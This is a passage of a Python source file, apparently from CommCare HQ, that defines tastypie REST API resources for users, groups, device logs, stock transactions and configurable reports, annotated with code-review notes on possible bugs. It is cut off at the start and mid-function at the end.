raise_odata_permissions_issues,
)
from corehq.apps.api.resources.auth import (
AdminAuthentication,
ODataAuthentication,
RequirePermissionAuthentication,
LoginAuthentication)
from corehq.apps.api.resources.meta import CustomResourceMeta
from corehq.apps.api.util import get_obj
from corehq.apps.app_manager.models import Application
from corehq.apps.domain.forms import clean_password
from corehq.apps.domain.models import Domain
from corehq.apps.es import UserES
from corehq.apps.export.esaccessors import (
get_case_export_base_query,
get_form_export_base_query,
)
from corehq.apps.export.models import CaseExportInstance, FormExportInstance
from corehq.apps.export.transforms import case_or_user_id_to_name
from corehq.apps.groups.models import Group
from corehq.apps.locations.permissions import location_safe
from corehq.apps.reports.analytics.esaccessors import (
get_case_types_for_domain_es,
)
from corehq.apps.reports.standard.cases.utils import (
query_location_restricted_cases,
query_location_restricted_forms,
)
from corehq.apps.reports.standard.message_event_display import get_event_display_api, get_sms_status_display_raw
from corehq.apps.sms.util import strip_plus, get_backend_name
from corehq.apps.userreports.columns import UCRExpandDatabaseSubcolumn
from corehq.apps.userreports.models import (
ReportConfiguration,
StaticReportConfiguration,
report_config_id_is_static,
)
from corehq.apps.userreports.reports.data_source import (
ConfigurableReportDataSource,
)
from corehq.apps.userreports.reports.view import (
get_filter_values,
query_dict_to_dict,
)
from corehq.apps.users.dbaccessors import (
get_all_user_id_username_pairs_by_domain,
)
from corehq.apps.users.models import (
CommCareUser,
CouchUser,
Permissions,
SQLUserRole,
WebUser,
)
from corehq.apps.users.util import raw_username
from corehq.const import USER_CHANGE_VIA_API
from corehq.util import get_document_or_404
from corehq.util.couch import DocumentNotFound, get_document_or_not_found
from corehq.util.model_log import ModelAction, log_model_change
from corehq.util.timer import TimingContext
from . import (
CouchResourceMixin,
DomainSpecificResourceMixin,
HqBaseResource,
v0_1,
v0_4,
CorsResourceMixin)
from .pagination import DoesNothingPaginator, NoCountingPaginator
# Test hook: when set, replaces user_es_call in BulkUserResource.obj_get_list.
MOCK_BULK_USER_ES = None
def user_es_call(domain, q, fields, size, start_at):
    """Run a UserES query for *domain* and return the raw ES hits."""
    query = (UserES()
             .domain(domain)
             .fields(fields)
             .size(size)
             .start(start_at))
    if q is not None:
        # NOTE(review): the chained builder calls above each return a query
        # object; if set_query likewise returns a new instance instead of
        # mutating in place, this discarded return value means ``q`` has no
        # effect -- verify against the UserES/ESQuery implementation.
        query.set_query({"query_string": {"query": q}})
    return query.run().hits
def _set_role_for_bundle(kwargs, bundle):
    """Resolve the role named in bundle.data and assign it to bundle.obj.

    Raises BadRequest when no role with that name exists in the domain.
    """
    domain = kwargs['domain']
    # check for roles associated with the domain
    domain_roles = SQLUserRole.objects.by_domain_and_name(domain, bundle.data.get('role'))
    if not domain_roles:
        raise BadRequest(f"Invalid User Role '{bundle.data.get('role')}'")
    # Role names are not unique within a domain; take the first match.
    qualified_role_id = domain_roles[0].get_qualified_id()
    bundle.obj.set_role(domain, qualified_role_id)
class BulkUserResource(HqBaseResource, DomainSpecificResourceMixin):
    """
    A read-only user data resource based on elasticsearch.
    Supported Params: limit offset q fields
    """

    type = "bulk-user"
    id = fields.CharField(attribute='id', readonly=True, unique=True)
    email = fields.CharField(attribute='email')
    username = fields.CharField(attribute='username', unique=True)
    first_name = fields.CharField(attribute='first_name', null=True)
    last_name = fields.CharField(attribute='last_name', null=True)
    phone_numbers = fields.ListField(attribute='phone_numbers', null=True)

    @staticmethod
    def to_obj(user):
        '''
        Takes a flat dict and returns an object
        '''
        # ES stores the id as '_id'; expose it under the resource's 'id' field.
        if '_id' in user:
            user['id'] = user.pop('_id')
        return namedtuple('user', list(user))(**user)

    class Meta(CustomResourceMeta):
        authentication = RequirePermissionAuthentication(Permissions.edit_commcare_users)
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        object_class = object
        resource_name = 'bulk-user'

    def dehydrate(self, bundle):
        # Restrict the serialized payload to the caller-requested fields, if any.
        fields = bundle.request.GET.getlist('fields')
        data = {}
        if not fields:
            return bundle
        for field in fields:
            data[field] = bundle.data[field]
        bundle.data = data
        return bundle

    def obj_get_list(self, bundle, **kwargs):
        # Reject unknown field names up front.
        request_fields = bundle.request.GET.getlist('fields')
        for field in request_fields:
            if field not in self.fields:
                raise BadRequest('{0} is not a valid field'.format(field))
        params = bundle.request.GET
        param = lambda p: params.get(p, None)
        # Query ES for '_id' (its native key) instead of the public 'id'.
        fields = list(self.fields)
        fields.remove('id')
        fields.append('_id')
        # MOCK_BULK_USER_ES lets tests stub out the ES call.
        fn = MOCK_BULK_USER_ES or user_es_call
        users = fn(
            domain=kwargs['domain'],
            q=param('q'),
            fields=fields,
            size=param('limit'),
            start_at=param('offset'),
        )
        return list(map(self.to_obj, users))

    def detail_uri_kwargs(self, bundle_or_obj):
        return {
            'pk': get_obj(bundle_or_obj).id
        }
class CommCareUserResource(v0_1.CommCareUserResource):
    """Read/write API for mobile workers, extending the read-only v0_1 resource."""

    class Meta(v0_1.CommCareUserResource.Meta):
        detail_allowed_methods = ['get', 'put', 'delete']
        list_allowed_methods = ['get', 'post']
        always_return_data = True

    def serialize(self, request, data, format, options=None):
        # On create, respond with just the new user's id instead of the full bundle.
        if not isinstance(data, dict) and request.method == 'POST':
            data = {'id': data.obj._id}
        return self._meta.serializer.serialize(data, format, options)

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
        # The detail URL needs the user's domain, so build it via reverse()
        # instead of the default tastypie URI construction.
        if bundle_or_obj is None:
            return super(CommCareUserResource, self).get_resource_uri(bundle_or_obj, url_name)
        elif isinstance(bundle_or_obj, Bundle):
            obj = bundle_or_obj.obj
        else:
            obj = bundle_or_obj
        return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
                                                          domain=obj.domain,
                                                          api_name=self._meta.api_name,
                                                          pk=obj._id))

    def _update(self, bundle):
        """Apply bundle.data onto bundle.obj field by field.

        Returns True when at least one change requires a save. On password
        validation failure, appends messages to bundle.obj.errors and returns
        False instead of raising.
        """
        should_save = False
        for key, value in bundle.data.items():
            if getattr(bundle.obj, key, None) != value:
                if key == 'phone_numbers':
                    # Replace the whole list; first number becomes the default.
                    bundle.obj.phone_numbers = []
                    for idx, phone_number in enumerate(bundle.data.get('phone_numbers', [])):
                        bundle.obj.add_phone_number(strip_plus(phone_number))
                        if idx == 0:
                            bundle.obj.set_default_phone_number(strip_plus(phone_number))
                        should_save = True
                elif key == 'groups':
                    bundle.obj.set_groups(bundle.data.get("groups", []))
                    should_save = True
                elif key in ['email', 'username']:
                    setattr(bundle.obj, key, value.lower())
                    should_save = True
                elif key == 'password':
                    # Enforce the domain's password policy before setting.
                    domain = Domain.get_by_name(bundle.obj.domain)
                    if domain.strong_mobile_passwords:
                        try:
                            clean_password(bundle.data.get("password"))
                        except ValidationError as e:
                            if not hasattr(bundle.obj, 'errors'):
                                bundle.obj.errors = []
                            bundle.obj.errors.append(str(e))
                            return False
                    bundle.obj.set_password(bundle.data.get("password"))
                    should_save = True
                elif key == 'user_data':
                    # NOTE(review): unlike the other branches this never sets
                    # should_save, so a user_data-only update may not be
                    # persisted -- verify whether that is intentional.
                    try:
                        bundle.obj.update_metadata(value)
                    except ValueError as e:
                        raise BadRequest(str(e))
                else:
                    setattr(bundle.obj, key, value)
                    should_save = True
        return should_save

    def obj_create(self, bundle, **kwargs):
        """Create a mobile worker; on any failure roll back what was created."""
        try:
            bundle.obj = CommCareUser.create(
                domain=kwargs['domain'],
                username=bundle.data['username'].lower(),
                password=bundle.data['password'],
                created_by=bundle.request.user,
                created_via=USER_CHANGE_VIA_API,
                email=bundle.data.get('email', '').lower(),
            )
            # Password already consumed by create(); drop it so _update skips it.
            del bundle.data['password']
            self._update(bundle)
            bundle.obj.save()
        except Exception:
            # Roll back: retire the couch user if it got an id, and delete the
            # Django auth user if one was created.
            # NOTE(review): WebUserResource.obj_create below guards the django
            # deletion with an else on the retire branch; here both run --
            # confirm the asymmetry is intended.
            if bundle.obj._id:
                bundle.obj.retire(deleted_by=bundle.request.user, deleted_via=USER_CHANGE_VIA_API)
            try:
                django_user = bundle.obj.get_django_user()
            except User.DoesNotExist:
                pass
            else:
                django_user.delete()
                log_model_change(bundle.request.user, django_user, message=f"deleted_via: {USER_CHANGE_VIA_API}",
                                 action=ModelAction.DELETE)
            raise
        return bundle

    def obj_update(self, bundle, **kwargs):
        bundle.obj = CommCareUser.get(kwargs['pk'])
        assert bundle.obj.domain == kwargs['domain']
        if self._update(bundle):
            assert bundle.obj.domain == kwargs['domain']
            bundle.obj.save()
            return bundle
        else:
            # _update collected validation messages on bundle.obj.errors.
            raise BadRequest(''.join(chain.from_iterable(bundle.obj.errors)))

    def obj_delete(self, bundle, **kwargs):
        user = CommCareUser.get(kwargs['pk'])
        if user:
            user.retire(deleted_by=bundle.request.user, deleted_via=USER_CHANGE_VIA_API)
        # NOTE(review): ImmediateHttpResponse is an exception type; it is
        # returned here (not raised), and tastypie ignores obj_delete's return
        # value -- verify the intended response status actually reaches clients.
        return ImmediateHttpResponse(response=http.HttpAccepted())
class WebUserResource(v0_1.WebUserResource):
    """Read/write API for web users, extending the read-only v0_1 resource."""

    class Meta(v0_1.WebUserResource.Meta):
        detail_allowed_methods = ['get', 'put', 'delete']
        list_allowed_methods = ['get', 'post']
        always_return_data = True

    def serialize(self, request, data, format, options=None):
        # On create, respond with just the new user's id instead of the full bundle.
        if not isinstance(data, dict) and request.method == 'POST':
            data = {'id': data.obj._id}
        return self._meta.serializer.serialize(data, format, options)

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
        # NOTE(review): if bundle_or_obj is neither a Bundle nor None, `domain`
        # and `obj` are never bound and the reverse() call below raises
        # NameError -- verify no caller hits that path.
        if isinstance(bundle_or_obj, Bundle):
            domain = bundle_or_obj.request.domain
            obj = bundle_or_obj.obj
        elif bundle_or_obj is None:
            return None
        return reverse('api_dispatch_detail', kwargs=dict(resource_name=self._meta.resource_name,
                                                          domain=domain,
                                                          api_name=self._meta.api_name,
                                                          pk=obj._id))

    def _validate(self, bundle):
        """Reject inconsistent is_admin/role combinations before any write."""
        if bundle.data.get('is_admin', False):
            # default value Admin since that will be assigned later anyway since is_admin is True
            if bundle.data.get('role', 'Admin') != 'Admin':
                raise BadRequest("An admin can have only one role : Admin")
        else:
            if not bundle.data.get('role', None):
                raise BadRequest("Please assign role for non admin user")

    def _update(self, bundle):
        """Apply bundle.data onto bundle.obj; return True when a save is needed."""
        should_save = False
        for key, value in bundle.data.items():
            if key == "role":
                # role handled in _set_role_for_bundle
                continue
            if getattr(bundle.obj, key, None) != value:
                if key == 'phone_numbers':
                    # Replace the whole list; first number becomes the default.
                    bundle.obj.phone_numbers = []
                    for idx, phone_number in enumerate(bundle.data.get('phone_numbers', [])):
                        bundle.obj.add_phone_number(strip_plus(phone_number))
                        if idx == 0:
                            bundle.obj.set_default_phone_number(strip_plus(phone_number))
                        should_save = True
                elif key in ['email', 'username']:
                    setattr(bundle.obj, key, value.lower())
                    should_save = True
                else:
                    setattr(bundle.obj, key, value)
                    should_save = True
        return should_save

    def obj_create(self, bundle, **kwargs):
        self._validate(bundle)
        try:
            # NOTE(review): mutating self._meta.domain stores request state on
            # the shared resource instance -- confirm this is safe under
            # concurrent requests.
            self._meta.domain = kwargs['domain']
            bundle.obj = WebUser.create(
                domain=kwargs['domain'],
                username=bundle.data['username'].lower(),
                password=bundle.data['password'],
                created_by=bundle.request.user,
                created_via=USER_CHANGE_VIA_API,
                email=bundle.data.get('email', '').lower(),
                is_admin=bundle.data.get('is_admin', False)
            )
            # Password already consumed by create(); drop it so _update skips it.
            del bundle.data['password']
            self._update(bundle)
            # is_admin takes priority over role
            if not bundle.obj.is_admin and bundle.data.get('role'):
                _set_role_for_bundle(kwargs, bundle)
            bundle.obj.save()
        except Exception:
            # Roll back the partially-created user before re-raising.
            if bundle.obj._id:
                bundle.obj.delete(deleted_by=bundle.request.user, deleted_via=USER_CHANGE_VIA_API)
            else:
                try:
                    django_user = bundle.obj.get_django_user()
                except User.DoesNotExist:
                    pass
                else:
                    django_user.delete()
                    log_model_change(bundle.request.user, django_user, message=f"deleted_via: {USER_CHANGE_VIA_API}",
                                     action=ModelAction.DELETE)
            raise
        return bundle

    def obj_update(self, bundle, **kwargs):
        self._validate(bundle)
        bundle.obj = WebUser.get(kwargs['pk'])
        # The user must already belong to the domain being edited.
        assert kwargs['domain'] in bundle.obj.domains
        if self._update(bundle):
            assert kwargs['domain'] in bundle.obj.domains
            bundle.obj.save()
        return bundle
class AdminWebUserResource(v0_1.UserResource):
    """Admin-only, read-only lookup of web users across all domains."""

    domains = fields.ListField(attribute='domains')

    def obj_get(self, bundle, **kwargs):
        return WebUser.get(kwargs['pk'])

    def obj_get_list(self, bundle, **kwargs):
        # NOTE(review): get_by_username can return None for an unknown
        # username, yielding [None] here -- verify downstream handling.
        if 'username' in bundle.request.GET:
            return [WebUser.get_by_username(bundle.request.GET['username'])]
        return [WebUser.wrap(u) for u in UserES().web_users().run().hits]

    class Meta(WebUserResource.Meta):
        authentication = AdminAuthentication()
        detail_allowed_methods = ['get']
        list_allowed_methods = ['get']
class GroupResource(v0_4.GroupResource):
    """Read/write API for case-sharing/reporting groups."""

    class Meta(v0_4.GroupResource.Meta):
        detail_allowed_methods = ['get', 'put', 'delete']
        list_allowed_methods = ['get', 'post', 'patch']
        always_return_data = True

    def serialize(self, request, data, format, options=None):
        # On errors return only the message; on create return only the new id.
        if not isinstance(data, dict):
            if 'error_message' in data.data:
                data = {'error_message': data.data['error_message']}
            elif request.method == 'POST':
                data = {'id': data.obj._id}
        return self._meta.serializer.serialize(data, format, options)

    def patch_list(self, request=None, **kwargs):
        """
        Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1466
        (BSD licensed) and modified to pass the kwargs to `obj_create` and support only create method
        """
        request = convert_post_to_patch(request)
        deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
        collection_name = self._meta.collection_name
        if collection_name not in deserialized:
            raise BadRequest("Invalid data sent: missing '%s'" % collection_name)
        if len(deserialized[collection_name]) and 'put' not in self._meta.detail_allowed_methods:
            raise ImmediateHttpResponse(response=http.HttpMethodNotAllowed())
        bundles_seen = []
        # Any failed create downgrades the whole response to 400.
        status = http.HttpAccepted
        for data in deserialized[collection_name]:
            data = self.alter_deserialized_detail_data(request, data)
            bundle = self.build_bundle(data=dict_strip_unicode_keys(data), request=request)
            try:
                self.obj_create(bundle=bundle, **self.remove_api_resource_names(kwargs))
            except AssertionError as e:
                # obj_create signals "name already exists" via AssertionError;
                # surface the message in place of the id.
                status = http.HttpBadRequest
                bundle.data['_id'] = str(e)
            bundles_seen.append(bundle)
        to_be_serialized = [bundle.data['_id'] for bundle in bundles_seen]
        return self.create_response(request, to_be_serialized, response_class=status)

    def post_list(self, request, **kwargs):
        """
        Exactly copied from https://github.com/toastdriven/django-tastypie/blob/v0.9.14/tastypie/resources.py#L1314
        (BSD licensed) and modified to catch Exception and not returning traceback
        """
        deserialized = self.deserialize(request, request.body, format=request.META.get('CONTENT_TYPE', 'application/json'))
        deserialized = self.alter_deserialized_detail_data(request, deserialized)
        bundle = self.build_bundle(data=dict_strip_unicode_keys(deserialized), request=request)
        try:
            updated_bundle = self.obj_create(bundle, **self.remove_api_resource_names(kwargs))
            location = self.get_resource_uri(updated_bundle)

            if not self._meta.always_return_data:
                return http.HttpCreated(location=location)
            else:
                updated_bundle = self.full_dehydrate(updated_bundle)
                updated_bundle = self.alter_detail_data_to_serialize(request, updated_bundle)
                return self.create_response(request, updated_bundle, response_class=http.HttpCreated, location=location)
        except AssertionError as e:
            bundle.data['error_message'] = str(e)
            return self.create_response(request, bundle, response_class=http.HttpBadRequest)

    def _update(self, bundle):
        """Apply bundle.data onto the group; return True when a save is needed."""
        should_save = False
        for key, value in bundle.data.items():
            if key == 'name' and getattr(bundle.obj, key, None) != value:
                if not Group.by_name(bundle.obj.domain, value):
                    setattr(bundle.obj, key, value or '')
                    should_save = True
                else:
                    raise Exception("A group with this name already exists")
            # NOTE(review): this is `if`, not `elif`, so for key == 'name' the
            # trailing `elif getattr(...) != value` below is evaluated too and
            # can re-assign the name (e.g. when value is falsy and was coerced
            # to '' above) -- verify the intended chaining.
            if key == 'users' and getattr(bundle.obj, key, None) != value:
                users_to_add = set(value) - set(bundle.obj.users)
                users_to_remove = set(bundle.obj.users) - set(value)
                for user in users_to_add:
                    bundle.obj.add_user(user)
                    should_save = True
                for user in users_to_remove:
                    bundle.obj.remove_user(user)
                    should_save = True
            elif getattr(bundle.obj, key, None) != value:
                setattr(bundle.obj, key, value)
                should_save = True
        return should_save

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_detail'):
        if bundle_or_obj is None:
            return super(GroupResource, self).get_resource_uri(bundle_or_obj, url_name)
        elif isinstance(bundle_or_obj, Bundle):
            obj = bundle_or_obj.obj
        else:
            obj = bundle_or_obj
        return self._get_resource_uri(obj)

    def _get_resource_uri(self, obj):
        # This function is called up to 1000 times per request
        # so build url from a known string template
        # to avoid calling the expensive `reverse` function each time
        return self._get_resource_uri_template.format(domain=obj.domain, pk=obj._id)

    @memoized_property
    def _get_resource_uri_template(self):
        """Returns the literal string "/a/{domain}/api/v0.5/group/{pk}/" in a DRY way"""
        return reverse('api_dispatch_detail', kwargs=dict(
            resource_name=self._meta.resource_name,
            api_name=self._meta.api_name,
            domain='__domain__',
            pk='__pk__')).replace('__pk__', '{pk}').replace('__domain__', '{domain}')

    def obj_create(self, bundle, request=None, **kwargs):
        # Group names must be unique within a domain.
        if not Group.by_name(kwargs['domain'], bundle.data.get("name")):
            bundle.obj = Group(bundle.data)
            bundle.obj.name = bundle.obj.name or ''
            bundle.obj.domain = kwargs['domain']
            bundle.obj.save()
            # Keep each member's group membership in sync with the new group.
            for user in bundle.obj.users:
                CommCareUser.get(user).set_groups([bundle.obj._id])
        else:
            # AssertionError is translated to HTTP 400 by post_list/patch_list.
            raise AssertionError("A group with name %s already exists" % bundle.data.get("name"))
        return bundle

    def obj_update(self, bundle, **kwargs):
        bundle.obj = Group.get(kwargs['pk'])
        assert bundle.obj.domain == kwargs['domain']
        if self._update(bundle):
            assert bundle.obj.domain == kwargs['domain']
            bundle.obj.save()
        return bundle

    def obj_delete(self, bundle, **kwargs):
        group = self.obj_get(bundle, **kwargs)
        # Soft delete so the group can be restored.
        group.soft_delete()
        return bundle
class DomainAuthorization(ReadOnlyAuthorization):
    """Read-only authorization that limits list results to the request's domain."""

    def __init__(self, domain_key='domain', *args, **kwargs):
        """``domain_key`` is the ORM lookup path used to filter by domain.

        FIX: extra positional/keyword arguments were previously accepted and
        silently discarded without calling the base initializer; forward them
        so misuse surfaces and base-class setup runs.
        """
        super().__init__(*args, **kwargs)
        self.domain_key = domain_key

    def read_list(self, object_list, bundle):
        # Only expose rows belonging to the authenticated request's domain.
        return object_list.filter(**{self.domain_key: bundle.request.domain})
class DeviceReportResource(HqBaseResource, ModelResource):
    """Read-only API over phone device-log entries, filtered to the request domain."""

    class Meta(object):
        queryset = DeviceReportEntry.objects.all()
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        resource_name = 'device-log'
        authentication = RequirePermissionAuthentication(Permissions.edit_data)
        authorization = DomainAuthorization()
        # Skip expensive COUNT queries when paginating large log tables.
        paginator_class = NoCountingPaginator
        filtering = {
            # this is needed for the domain filtering but any values passed in via the URL get overridden
            "domain": ('exact',),
            "date": ('exact', 'gt', 'gte', 'lt', 'lte', 'range'),
            "user_id": ('exact',),
            "username": ('exact',),
            "type": ('exact',),
            "xform_id": ('exact',),
            "device_id": ('exact',),
        }
class StockTransactionResource(HqBaseResource, ModelResource):
    """Read-only API over stock transactions, filtered to the request domain."""

    class Meta(object):
        queryset = StockTransaction.objects.all()
        list_allowed_methods = ['get']
        detail_allowed_methods = ['get']
        resource_name = 'stock_transaction'
        authentication = RequirePermissionAuthentication(Permissions.view_reports)
        # Skip expensive COUNT queries when paginating.
        paginator_class = NoCountingPaginator
        # Transactions hang off a report; filter via the report's domain.
        authorization = DomainAuthorization(domain_key='report__domain')
        filtering = {
            "case_id": ('exact',),
            # FIX: was ('exact') -- a plain string, not a 1-tuple; it only
            # worked because tastypie's membership test did a substring match.
            "section_id": ('exact',),
        }
        fields = ['case_id', 'product_id', 'type', 'section_id', 'quantity', 'stock_on_hand']
        include_resource_uri = False

    def build_filters(self, filters=None):
        """Translate start_date/end_date query params into report__date bounds."""
        orm_filters = super(StockTransactionResource, self).build_filters(filters)
        # FIX: guard against the default filters=None, which previously made
        # the membership tests below raise TypeError.
        filters = filters or {}
        if 'start_date' in filters:
            orm_filters['report__date__gte'] = filters['start_date']
        if 'end_date' in filters:
            orm_filters['report__date__lte'] = filters['end_date']
        return orm_filters

    def dehydrate(self, bundle):
        # Denormalize product name and report date onto each transaction.
        bundle.data['product_name'] = bundle.obj.sql_product.name
        bundle.data['transaction_date'] = bundle.obj.report.date
        return bundle
# Lightweight container for one page of configurable-report results.
ConfigurableReportData = namedtuple(
    "ConfigurableReportData",
    ["data", "columns", "id", "domain", "total_records", "get_params", "next_page"],
)
class ConfigurableReportDataResource(HqBaseResource, DomainSpecificResourceMixin):
    """
    A resource that replicates the behavior of the ajax part of the
    ConfigurableReportView view.
    """
    data = fields.ListField(attribute="data", readonly=True)
    columns = fields.ListField(attribute="columns", readonly=True)
    total_records = fields.IntegerField(attribute="total_records", readonly=True)
    next_page = fields.CharField(attribute="next_page", readonly=True)
    LIMIT_DEFAULT = 50
    LIMIT_MAX = 50

    def _get_start_param(self, bundle):
        """Parse and validate the `offset` query param (non-negative int)."""
        try:
            start = int(bundle.request.GET.get('offset', 0))
            if start < 0:
                raise ValueError
        except (ValueError, TypeError):
            # Fixed: the message used to say "start", but the query
            # parameter is actually named "offset".
            raise BadRequest("offset must be a positive integer.")
        return start

    def _get_limit_param(self, bundle):
        """Parse and validate the `limit` query param (0..LIMIT_MAX)."""
        try:
            limit = int(bundle.request.GET.get('limit', self.LIMIT_DEFAULT))
            if limit < 0:
                raise ValueError
        except (ValueError, TypeError):
            raise BadRequest("limit must be a positive integer.")
        if limit > self.LIMIT_MAX:
            raise BadRequest("Limit may not exceed {}.".format(self.LIMIT_MAX))
        return limit

    def _get_next_page(self, domain, id_, start, limit, total_records, get_query_dict):
        """Return the URL of the next page, or "" when this page is the last."""
        if total_records > start + limit:
            start += limit
            new_get_params = get_query_dict.copy()
            new_get_params["offset"] = start
            # limit has not changed, but it may not have been present in get params before.
            new_get_params["limit"] = limit
            return reverse('api_dispatch_detail', kwargs=dict(
                api_name=self._meta.api_name,
                resource_name=self._meta.resource_name,
                domain=domain,
                pk=id_,
            )) + "?" + new_get_params.urlencode()
        else:
            return ""

    def _get_report_data(self, report_config, domain, start, limit, get_params):
        """Run the report and return (rows, column descriptors, total count)."""
        report = ConfigurableReportDataSource.from_spec(report_config, include_prefilters=True)
        # Filters without an explicit datatype are treated as strings.
        # (Renamed loop variable: the original shadowed the builtin `filter`.)
        string_type_params = [
            ui_filter.name
            for ui_filter in report_config.ui_filters
            if getattr(ui_filter, 'datatype', 'string') == "string"
        ]
        filter_values = get_filter_values(
            report_config.ui_filters,
            query_dict_to_dict(get_params, domain, string_type_params)
        )
        report.set_filter_values(filter_values)
        page = list(report.get_data(start=start, limit=limit))
        columns = []
        for column in report.columns:
            simple_column = {
                "header": column.header,
                "slug": column.slug,
            }
            if isinstance(column, UCRExpandDatabaseSubcolumn):
                simple_column['expand_column_value'] = column.expand_value
            columns.append(simple_column)
        total_records = report.get_total_records()
        return page, columns, total_records

    def obj_get(self, bundle, **kwargs):
        """Assemble one page of report data for the requested configuration."""
        domain = kwargs['domain']
        pk = kwargs['pk']
        start = self._get_start_param(bundle)
        limit = self._get_limit_param(bundle)
        report_config = self._get_report_configuration(pk, domain)
        page, columns, total_records = self._get_report_data(
            report_config, domain, start, limit, bundle.request.GET)
        return ConfigurableReportData(
            data=page,
            columns=columns,
            total_records=total_records,
            id=report_config._id,
            domain=domain,
            get_params=bundle.request.GET,
            next_page=self._get_next_page(
                domain,
                report_config._id,
                start,
                limit,
                total_records,
                bundle.request.GET,
            )
        )

    def _get_report_configuration(self, id_, domain):
        """
        Fetch the required ReportConfiguration object
        :param id_: The id of the ReportConfiguration
        :param domain: The domain of the ReportConfiguration
        :return: A ReportConfiguration
        """
        try:
            if report_config_id_is_static(id_):
                return StaticReportConfiguration.by_id(id_, domain=domain)
            else:
                return get_document_or_not_found(ReportConfiguration, domain, id_)
        except DocumentNotFound:
            raise NotFound

    def detail_uri_kwargs(self, bundle_or_obj):
        return {
            'domain': get_obj(bundle_or_obj).domain,
            'pk': get_obj(bundle_or_obj).id,
        }

    def get_resource_uri(self, bundle_or_obj=None, url_name='api_dispatch_list'):
        """Append paging params so the URI round-trips to the same page."""
        uri = super(ConfigurableReportDataResource, self).get_resource_uri(bundle_or_obj, url_name)
        if bundle_or_obj is not None and uri:
            get_params = get_obj(bundle_or_obj).get_params.copy()
            if "offset" not in get_params:
                get_params["offset"] = 0
            if "limit" not in get_params:
                get_params["limit"] = self.LIMIT_DEFAULT
            uri += "?{}".format(get_params.urlencode())
        return uri

    class Meta(CustomResourceMeta):
        authentication = RequirePermissionAuthentication(Permissions.view_reports, allow_session_auth=True)
        list_allowed_methods = []
        detail_allowed_methods = ["get"]
class SimpleReportConfigurationResource(CouchResourceMixin, HqBaseResource, DomainSpecificResourceMixin):
    """Read-only metadata (title, filters, columns) for UCR report configs."""

    id = fields.CharField(attribute='get_id', readonly=True, unique=True)
    title = fields.CharField(readonly=True, attribute="title", null=True)
    filters = fields.ListField(readonly=True)
    columns = fields.ListField(readonly=True)

    def dehydrate_filters(self, bundle):
        """Expose each report filter as a small dict of type/datatype/slug."""
        summaries = []
        for report_filter in bundle.obj.filters:
            summaries.append({
                "type": report_filter["type"],
                "datatype": report_filter["datatype"],
                "slug": report_filter["slug"]
            })
        return summaries

    def dehydrate_columns(self, bundle):
        """Expose each report column as a small dict of id/display/type."""
        summaries = []
        for column in bundle.obj.columns:
            summaries.append({
                "column_id": column['column_id'],
                "display": column['display'],
                "type": column["type"],
            })
        return summaries

    def obj_get(self, bundle, **kwargs):
        """Fetch a single ReportConfiguration, translating 404 into NotFound."""
        try:
            return get_document_or_404(ReportConfiguration, kwargs['domain'], kwargs['pk'])
        except Http404 as e:
            raise NotFound(str(e))

    def obj_get_list(self, bundle, **kwargs):
        return ReportConfiguration.by_domain(kwargs['domain'])

    def detail_uri_kwargs(self, bundle_or_obj):
        obj = get_obj(bundle_or_obj)
        return {
            'domain': obj.domain,
            'pk': obj._id,
        }

    class Meta(CustomResourceMeta):
        list_allowed_methods = ["get"]
        detail_allowed_methods = ["get"]
        paginator_class = DoesNothingPaginator
# Pair of (domain_name, project_name); both default to the empty string.
UserDomain = namedtuple('UserDomain', ['domain_name', 'project_name'])
UserDomain.__new__.__defaults__ = ('', '')
class UserDomainsResource(CorsResourceMixin, Resource):
    """List the Zapier-enabled domains the authenticated user belongs to."""

    domain_name = fields.CharField(attribute='domain_name')
    project_name = fields.CharField(attribute='project_name')

    class Meta(object):
        resource_name = 'user_domains'
        authentication = LoginAuthentication(allow_session_auth=True)
        object_class = UserDomain
        include_resource_uri = False

    def dispatch_list(self, request, **kwargs):
        # Replace tastypie's bare 401 with a friendlier plain-text message.
        try:
            return super(UserDomainsResource, self).dispatch_list(request, **kwargs)
        except ImmediateHttpResponse as exc:
            if not isinstance(exc.response, HttpUnauthorized):
                raise
            raise ImmediateHttpResponse(
                response=HttpUnauthorized(
                    content='Username or API Key is incorrect', content_type='text/plain'
                )
            )

    def obj_get_list(self, bundle, **kwargs):
        return self.get_object_list(bundle.request)

    def get_object_list(self, request):
        couch_user = CouchUser.from_django_user(request.user)
        eligible_domains = [
            domain for domain in couch_user.get_domains()
            if domain_has_privilege(domain, privileges.ZAPIER_INTEGRATION)
        ]
        results = []
        for domain_name in eligible_domains:
            domain_object = Domain.get_by_name(domain_name)
            results.append(UserDomain(
                domain_name=domain_object.name,
                project_name=domain_object.hr_name or domain_object.name
            ))
        return results
class IdentityResource(CorsResourceMixin, Resource):
    """Return the authenticated user's own identity as a single object."""

    id = fields.CharField(attribute='get_id', readonly=True)
    username = fields.CharField(attribute='username', readonly=True)
    first_name = fields.CharField(attribute='first_name', readonly=True)
    last_name = fields.CharField(attribute='last_name', readonly=True)
    email = fields.CharField(attribute='email', readonly=True)

    def obj_get_list(self, bundle, **kwargs):
        # One-element list; the serializer below collapses it to one object.
        return [bundle.request.couch_user]

    class Meta(object):
        resource_name = 'identity'
        authentication = LoginAuthentication()
        serializer = ListToSingleObjectSerializer()
        detail_allowed_methods = []
        list_allowed_methods = ['get']
        object_class = CouchUser
        include_resource_uri = False
# (form_xmlns, form_name) pair; both default to the empty string.
Form = namedtuple('Form', ['form_xmlns', 'form_name'])
Form.__new__.__defaults__ = ('', '')
class DomainForms(Resource):
    """
    Returns: list of forms for a given domain with form name formatted for display in Zapier
    """
    form_xmlns = fields.CharField(attribute='form_xmlns')
    form_name = fields.CharField(attribute='form_name')

    class Meta(object):
        resource_name = 'domain_forms'
        authentication = RequirePermissionAuthentication(Permissions.access_api)
        object_class = Form
        include_resource_uri = False
        allowed_methods = ['get']
        limit = 200
        max_limit = 1000

    def obj_get_list(self, bundle, **kwargs):
        app_id = bundle.request.GET.get('application_id')
        if not app_id:
            raise NotFound('application_id parameter required')
        app = Application.get(docid=app_id)
        if not app:
            return []
        forms = []
        for entry in app.get_forms(bare=False):
            # "App > Module > Form" breadcrumb-style display name.
            display_name = '{} > {} > {}'.format(
